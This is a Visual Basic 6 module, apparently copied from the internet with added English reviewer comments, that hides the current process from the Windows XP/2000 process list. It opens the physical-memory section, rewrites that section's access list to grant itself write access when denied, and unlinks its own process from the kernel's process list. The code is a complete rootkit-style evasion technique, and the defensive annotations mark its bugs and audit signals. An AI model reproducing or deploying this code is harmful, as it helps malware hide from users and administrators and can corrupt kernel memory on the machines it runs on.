说明:下面的代码来自互联网,原作者不详。用下面的代码隐藏进程后可以用IceSword来查看和结束被隐藏的进程
'-------------------------------------------------------------------------------------
'模块名称:modHideProcess.bas
'
'模块功能:在 XP/2K 任务管理器的进程列表中隐藏当前进程
'
'使用方法:直接调用 HideCurrentProcess()
'
'模块作者:检索自互联网,原作者不详。
'
'修改日期:2006/06/26 最后整理
'
'阿勇 fxy_2002@163.com http://www.pc-soft.cn
'---------------------------------------------------------------------------------------
Option Explicit

' NTSTATUS codes. Only STATUS_ACCESS_DENIED is compared against a ZwOpenSection
' result in this listing; the other three are not referenced anywhere visible here.
Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const STATUS_INVALID_HandLE = &HC0000008
Private Const ERROR_SUCCESS = 0&
' Section access rights requested on the physical-memory section (OpenPhysicalMemory).
' SECTION_MAP_WRITE is also the right granted to CURRENT_USER by the DACL rewrite.
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
' Standard rights used to re-open the section just to rewrite its DACL after an
' access-denied result. WRITE_DAC on a kernel object is the notable one from a
' monitoring point of view: it is what makes the later writable mapping possible.
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
' ACE inheritance flag and SECURITY_INFORMATION selector for the DACL-only Get/SetSecurityInfo calls.
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4
' Native I/O status block (Status + Information). Declared but not used by any
' routine in this listing.
Private Type IO_STATUS_BLOCK
    Status As Long
    Information As Long
End Type

' Counted UTF-16 string as used by the native API: Length and MaximumLength are in
' bytes, Buffer is a raw pointer. Filled by RtlInitUnicodeString in OpenPhysicalMemory
' and referenced through OBJECT_ATTRIBUTES.ObjectName.
Private Type UNICODE_STRING
    Length As Integer
    MaximumLength As Integer
    Buffer As Long
End Type
' OBJECT_ATTRIBUTES.Attributes flag values. OpenPhysicalMemory sets Attributes to 0,
' so none of these is actually applied in this listing.
Private Const OBJ_INHERIT = &H2
Private Const OBJ_PERMANENT = &H10
Private Const OBJ_EXCLUSIVE = &H20
Private Const OBJ_CASE_INSENSITIVE = &H40
Private Const OBJ_OPENIF = &H80
Private Const OBJ_OPENLINK = &H100
Private Const OBJ_KERNEL_HandLE = &H200
Private Const OBJ_VALID_ATTRIBUTES = &H3F2
' Native OBJECT_ATTRIBUTES passed to ZwOpenSection. Length must hold the structure
' size (Len(Attributes) in OpenPhysicalMemory); ObjectName is a pointer to a
' UNICODE_STRING. The field name SecurityDeor looks truncated in this copy
' (presumably SecurityDescriptor) but OpenPhysicalMemory references it by this
' spelling, so it is kept as-is.
Private Type OBJECT_ATTRIBUTES
    Length As Long
    RootDirectory As Long
    ObjectName As Long
    Attributes As Long
    SecurityDeor As Long
    SecurityQualityOfService As Long
End Type

' ACL header layout. Not referenced by any routine in this listing; the DACL
' pointers below are handled as opaque Longs.
Private Type ACL
    AclRevision As Byte
    Sbz1 As Byte
    AclSize As Integer
    AceCount As Integer
    Sbz2 As Integer
End Type
' EXPLICIT_ACCESS.grfAccessMode values. SetPhyscialMemorySectionCanBeWrited uses GRANT_ACCESS.
Private Enum ACCESS_MODE
    NOT_USED_ACCESS
    GRANT_ACCESS
    SET_ACCESS
    DENY_ACCESS
    REVOKE_ACCESS
    SET_AUDIT_SUCCESS
    SET_AUDIT_FAILURE
End Enum

' TRUSTEE.MultipleTrusteeOperation values (left at the default 0 in this listing).
Private Enum MULTIPLE_TRUSTEE_OPERATION
    NO_MULTIPLE_TRUSTEE
    TRUSTEE_IS_IMPERSONATE
End Enum

' How TRUSTEE.ptstrName is to be interpreted; the DACL rewrite uses TRUSTEE_IS_NAME
' with the literal "CURRENT_USER".
Private Enum TRUSTEE_FORM
    TRUSTEE_IS_SID
    TRUSTEE_IS_NAME
End Enum

Private Enum TRUSTEE_TYPE
    TRUSTEE_IS_UNKNOWN
    TRUSTEE_IS_USER
    TRUSTEE_IS_GROUP
End Enum

' Trustee descriptor embedded in EXPLICIT_ACCESS. ptstrName is a VB String here;
' the A-suffixed advapi32 entry points are declared below, so the ANSI form is intended.
Private Type TRUSTEE
    pMultipleTrustee As Long
    MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
    TrusteeForm As TRUSTEE_FORM
    TrusteeType As TRUSTEE_TYPE
    ptstrName As String
End Type

' One access-control entry request for SetEntriesInAcl.
Private Type EXPLICIT_ACCESS
    grfAccessPermissions As Long
    grfAccessMode As ACCESS_MODE
    grfInheritance As Long
    TRUSTEE As TRUSTEE
End Type

' Dynamic array wrapper for EXPLICIT_ACCESS. Not referenced in this listing.
Private Type AceArray
    List() As EXPLICIT_ACCESS
End Type

' Object-type selector for Get/SetSecurityInfo. Only SE_KERNEL_OBJECT is used here
' (the section handle). The values are sequential from 0.
Private Enum SE_OBJECT_TYPE
    SE_UNKNOWN_OBJECT_TYPE = 0
    SE_FILE_OBJECT
    SE_SERVICE
    SE_PRINTER
    SE_REGISTRY_KEY
    SE_LMSHARE
    SE_KERNEL_OBJECT
    SE_WINDOW_OBJECT
    SE_DS_OBJECT
    SE_DS_OBJECT_ALL
    SE_PROVIDER_DEFINED_OBJECT
    SE_WMIGUID_OBJECT
End Enum
' ---- advapi32: DACL read/rewrite on the section handle -------------------------
' ppDacl/ppSacl are declared As Any so the caller can pass either a Long pointer
' ByRef (GetSecurityInfo, output) or a pointer ByVal (SetSecurityInfo, input).
Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, _
    ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As _
    Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, _
    ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As _
    Long, ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDeor As Long) As Long
' Merges one EXPLICIT_ACCESS into OldAcl and returns a newly allocated NewAcl, which
' the caller is expected to release with LocalFree.
Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias _
    "SetEntriesInAclA" (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries _
    As EXPLICIT_ACCESS, ByVal OldAcl As Long, NewAcl As Long) As Long
' Declared but not called in this listing; the EXPLICIT_ACCESS is filled by hand instead.
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias _
    "BuildExplicitAccessWithNameA" (pExplicitAccess As EXPLICIT_ACCESS, ByVal _
    pTrusteeName As String, ByVal AccessPermissions As Long, ByVal AccessMode As _
    ACCESS_MODE, ByVal Inheritance As Long)
' ---- ntdll: native section open ------------------------------------------------
' SourceString is a raw pointer to a NUL-terminated UTF-16 string (StrPtr of a VB String).
Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As _
    UNICODE_STRING, ByVal SourceString As Long)
' Returns an NTSTATUS; 0 means success. SectionHandle receives the handle.
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, _
    ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
' ---- kernel32: handle/view management and raw copies ---------------------------
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
' Used here to map 4 KiB windows of the section at a physical offset (dwFileOffsetLow).
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As _
    Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal _
    dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
' lpBaseAddress is declared As Any and is passed a Long ByRef by the callers in this
' listing; NOTE(review): that passes the address of the variable, not the view base —
' verify whether the unmap calls actually succeed.
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As _
    Long
' RtlMoveMemory; callers use ByVal on a Long to dereference a raw address.
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination _
    As Any, Source As Any, ByVal Length As Long)
' OS version probe used to select hard-coded offsets (NT 5.0 / 5.1 only).
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long
' ANSI OSVERSIONINFO; dwOSVersionInfoSize must be set to Len(...) before GetVersionEx.
' The callers only look at dwPlatformId (2 = NT), dwMajorVersion (5) and
' dwMinorVersion (0 or 1) to pick offsets.
Private Type OSVERSIONINFO
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
End Type

' Module state.
Private verinfo As OSVERSIONINFO          ' shared version buffer (filled twice, once per caller)
Private g_hNtDLL As Long                  ' not referenced in this listing
Private g_pMapPhysicalMemory As Long      ' base of the 4 KiB view of the page directory mapped by OpenPhysicalMemory;
                                          ' never unmapped anywhere in this listing
Private g_hMPM As Long                    ' handle to the physical-memory section (ZwOpenSection)
Private aByte(3) As Byte                  ' 4-byte scratch buffer for the unsigned conversion in LinearToPhys
Public Sub HideCurrentProcess() ' Hide the current application's process from the process list
    ' What this routine visibly does:
    '   1. selects two list-link offsets (Flink/Blink) plus a PID offset by OS version;
    '      only NT 5.0 and 5.1 are handled, any other version leaves all three at 0,
    '   2. opens a writable mapping of physical memory (OpenPhysicalMemory),
    '   3. reads a hard-coded kernel address (&HFFDFF124) and treats the value as the
    '      current thread object, then reads thread + &H44 and treats that as the process object,
    '   4. rewrites the Blink of the next entry and the Flink of the previous entry so the
    '      list skips this process (a direct kernel-object unlink).
    ' Reviewer notes (defensive):
    '   - On an OS other than 5.0/5.1 the offsets stay 0 but the two SetData writes still
    '     run against process+0 / process+4, which is kernel memory corruption rather than a
    '     clean failure. lOffsetPID is computed but never used.
    '   - SetData's Boolean result is ignored; if the second write fails the list is left
    '     half-unlinked.
    '   - g_pMapPhysicalMemory is never unmapped; only the section handle g_hMPM is closed.
    '   - The file header notes IceSword still enumerates and can terminate the process after this.
    '   - Write access to the physical-memory section from user mode, together with the DACL
    '     rewrite in SetPhyscialMemorySectionCanBeWrited, is a high-signal indicator of this
    '     class of tooling and a sensible thing to audit for.
    Dim thread As Long, process As Long, fw As Long, bw As Long
    Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
        If verinfo.dwPlatformId = 2 Then          ' 2 = Windows NT platform
            If verinfo.dwMajorVersion = 5 Then
                Select Case verinfo.dwMinorVersion
                    Case 0                         ' NT 5.0 offsets
                        lOffsetFlink = &HA0
                        lOffsetBlink = &HA4
                        lOffsetPID = &H9C
                    Case 1                         ' NT 5.1 offsets
                        lOffsetFlink = &H88
                        lOffsetBlink = &H8C
                        lOffsetPID = &H84
                End Select
            End If
        End If
    End If
    If OpenPhysicalMemory <> 0 Then
        thread = GetData(&HFFDFF124)              ' hard-coded kernel address; x86 layout assumed — TODO confirm
        process = GetData(thread + &H44)          ' value at thread+&H44 treated as the process object
        fw = GetData(process + lOffsetFlink)      ' next entry's link address
        bw = GetData(process + lOffsetBlink)      ' previous entry's link address
        SetData fw + 4, bw                        ' next.Blink = previous
        SetData bw, fw                            ' previous.Flink = next
        CloseHandle g_hMPM                        ' section handle only; the mapped view is leaked
    End If
End Sub
' Adds a GRANT ACE for "CURRENT_USER" with SECTION_MAP_WRITE to the DACL of hSection.
' Called from OpenPhysicalMemory after a STATUS_ACCESS_DENIED, with a handle opened
' for READ_CONTROL Or WRITE_DAC.
' Reviewer notes (defensive):
'   - Every API result (GetSecurityInfo, SetEntriesInAcl, SetSecurityInfo) is discarded;
'     if GetSecurityInfo fails, pDacl and pSD stay 0 and the rest proceeds regardless.
'   - The DACL change is made on the kernel object itself, so it presumably outlives this
'     process — worth confirming; a DACL write on this section is a strong audit signal.
'   - dwRes is unused and the CleanUp label has no matching GoTo, so the LocalFree calls
'     are reached by fall-through only.
Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
    Dim pDacl As Long
    Dim pNewDacl As Long
    Dim pSD As Long
    Dim dwRes As Long
    Dim ea As EXPLICIT_ACCESS
    ' Read the current DACL (pDacl) and the security descriptor that owns it (pSD).
    GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD
    ' Build a single explicit-access entry by hand (BuildExplicitAccessWithName is not used).
    ea.grfAccessPermissions = SECTION_MAP_WRITE
    ea.grfAccessMode = GRANT_ACCESS
    ea.grfInheritance = NO_INHERITANCE
    ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
    ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
    ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar
    ' Merge it into the existing DACL and write the result back to the object.
    SetEntriesInAcl 1, ea, pDacl, pNewDacl
    SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0
CleanUp:
    ' pSD was allocated by GetSecurityInfo, pNewDacl by SetEntriesInAcl.
    LocalFree pSD
    LocalFree pNewDacl
End Sub
' Opens the physical-memory section read/write, escalating through a DACL rewrite
' if the first open is denied, then maps a 4 KiB view of the page directory at a
' hard-coded physical address into g_pMapPhysicalMemory.
' Returns g_hMPM on success, otherwise 0 (the default Long return value).
' Reviewer notes (defensive):
'   - The object path is written with forward slashes in this copy; whether the
'     object manager resolves it as given is not something this listing shows.
'   - The page-directory address is only set for NT 5.0 (&H30000) and 5.1 (&H39000);
'     on any other version lDirectoty stays 0 and physical page 0 is mapped instead,
'     so every later page-table walk reads unrelated memory.
'   - Only the final Status is checked; the intermediate ZwOpenSection result and the
'     CloseHandle result are ignored. The version probe duplicates the one in
'     HideCurrentProcess.
Private Function OpenPhysicalMemory() As Long
    Dim Status As Long
    Dim PhysmemString As UNICODE_STRING
    Dim Attributes As OBJECT_ATTRIBUTES
    ' StrPtr yields the UTF-16 buffer of the VB String, as RtlInitUnicodeString expects.
    RtlInitUnicodeString PhysmemString, StrPtr("/Device/PhysicalMemory")
    Attributes.Length = Len(Attributes)
    Attributes.RootDirectory = 0
    Attributes.ObjectName = VarPtr(PhysmemString)
    Attributes.Attributes = 0
    Attributes.SecurityDeor = 0
    Attributes.SecurityQualityOfService = 0
    ' First attempt: map rights directly.
    Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    If Status = STATUS_ACCESS_DENIED Then
        ' Denied: re-open just to change the DACL, grant write to CURRENT_USER, then retry.
        Status = ZwOpenSection(g_hMPM, READ_CONTROL Or WRITE_DAC, Attributes)
        SetPhyscialMemorySectionCanBeWrited g_hMPM
        CloseHandle g_hMPM
        Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes)
    End If
    Dim lDirectoty As Long
    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
        If verinfo.dwPlatformId = 2 Then          ' 2 = Windows NT platform
            If verinfo.dwMajorVersion = 5 Then
                Select Case verinfo.dwMinorVersion
                    Case 0                         ' NT 5.0: physical address of the page directory
                        lDirectoty = &H30000
                    Case 1                         ' NT 5.1
                        lDirectoty = &H39000
                End Select
            End If
        End If
    End If
    If Status = 0 Then
        ' 4 = SECTION_MAP_READ; map one 4 KiB page at the page-directory offset.
        g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)
        If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM
    End If
End Function
' Translates the virtual address addr to a physical address by walking the 32-bit
' two-level page tables, starting from the mapped page directory at BaseAddress.
' Returns 0 (PAddr's initial value) when the directory or table entry has its
' present bit (bit 0) clear.
' Reviewer notes:
'   - The PGDE view opened in the Else branch is only unmapped when the PTE is present;
'     a non-present PTE leaves that 4 KiB view mapped.
'   - Bit &H80 of the directory entry selects the large-page branch (4 MiB frame
'     from the top 10 bits, offset from the low 22 bits); otherwise the entry's frame
'     is mapped and indexed by bits 12..21 of the virtual address.
'   - addr is a signed Long; it is copied through aByte/ByteArrToLong so the divide by
'     2^22 works on the unsigned value.
Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long
    Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long
    Dim lTemp As Long
    VAddr = addr
    CopyMemory aByte(0), VAddr, 4
    lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))          ' page-directory index (VA >> 22)
    PGDE = BaseAddress + lTemp * 4                        ' 4-byte entries
    CopyMemory PGDE, ByVal PGDE, 4                        ' dereference: PGDE now holds the entry value
    If (PGDE And 1) <> 0 Then                             ' present?
        lTemp = PGDE And &H80                             ' page-size bit
        If lTemp <> 0 Then
            PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)
        Else
            ' Map the page table's frame (4 = SECTION_MAP_READ) and read its entry.
            PGDE = MapViewOfFile(g_hMPM, 4, 0, PGDE And &HFFFFF000, &H1000)
            lTemp = (VAddr And &H3FF000) / (2 ^ 12)       ' page-table index (bits 12..21)
            PTE = PGDE + lTemp * 4
            CopyMemory PTE, ByVal PTE, 4                  ' dereference the PTE
            If (PTE And 1) <> 0 Then                      ' present?
                PAddr = (PTE And &HFFFFF000) + (VAddr And &HFFF)
                UnmapViewOfFile PGDE                      ' only reached on this branch
            End If
        End If
    End If
    LinearToPhys = PAddr
End Function
' Reads the 4-byte value at kernel virtual address addr through the physical-memory
' section: translate to a physical address, map its 4 KiB page read-only, copy the
' dword out, unmap. Returns 0 if the page could not be mapped.
' Reviewer notes:
'   - A 0 result from LinearToPhys is not treated as an error; phys = 0 maps physical
'     page 0 and the value read from there is returned as if valid.
'   - `((phys And &HFFF) / (2 ^ 2)) * 4` uses floating-point division, so it equals
'     phys And &HFFF exactly; no dword alignment is actually applied.
Private Function GetData(addr As Long) As Long
    Dim phys As Long, tmp As Long, ret As Long
    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, 4, 0, phys And &HFFFFF000, &H1000)   ' 4 = SECTION_MAP_READ
    If tmp <> 0 Then
        ret = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4    ' address of the dword inside the view
        CopyMemory ret, ByVal ret, 4                    ' dereference it
        UnmapViewOfFile tmp
        GetData = ret
    End If
End Function
' Writes the 4-byte value data to kernel virtual address addr through the
' physical-memory section: translate, map the page with SECTION_MAP_WRITE, copy the
' dword in, unmap. Returns True only if the page was mapped.
' Reviewer notes:
'   - As in GetData, a 0 from LinearToPhys is not rejected, so a failed translation
'     turns into a write to physical page 0.
'   - The division-then-multiply by 4 is an exact no-op in floating point.
'   - This is the only routine in the module that modifies kernel memory; the two
'     calls from HideCurrentProcess ignore its return value.
Private Function SetData(ByVal addr As Long, ByVal data As Long) As Boolean
    Dim phys As Long, tmp As Long, x As Long
    phys = LinearToPhys(g_pMapPhysicalMemory, addr)
    tmp = MapViewOfFile(g_hMPM, SECTION_MAP_WRITE, 0, phys And &HFFFFF000, &H1000)
    If tmp <> 0 Then
        x = tmp + ((phys And &HFFF) / (2 ^ 2)) * 4      ' address of the dword inside the view
        CopyMemory ByVal x, data, 4                     ' store data there
        UnmapViewOfFile tmp
        SetData = True
    End If
End Function
' Interprets inByte(0..3) as an unsigned little-endian 32-bit integer.
' Returns a Double so values with the top bit set do not come back negative,
' which is what the page-table arithmetic in LinearToPhys relies on.
Private Function ByteArrToLong(inByte() As Byte) As Double
    Dim pos As Integer
    Dim acc As Double
    acc = 0
    ' Horner form from the most significant byte down: acc = acc * 256 + next byte.
    For pos = 3 To 0 Step -1
        acc = acc * &H100 + inByte(pos)
    Next pos
    ByteArrToLong = acc
End Function